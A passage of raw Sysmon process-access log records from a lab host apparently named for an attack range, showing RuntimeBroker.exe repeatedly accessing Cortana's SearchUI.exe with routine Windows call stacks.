ystem32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246128C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246128C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246116C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246116C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245876C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 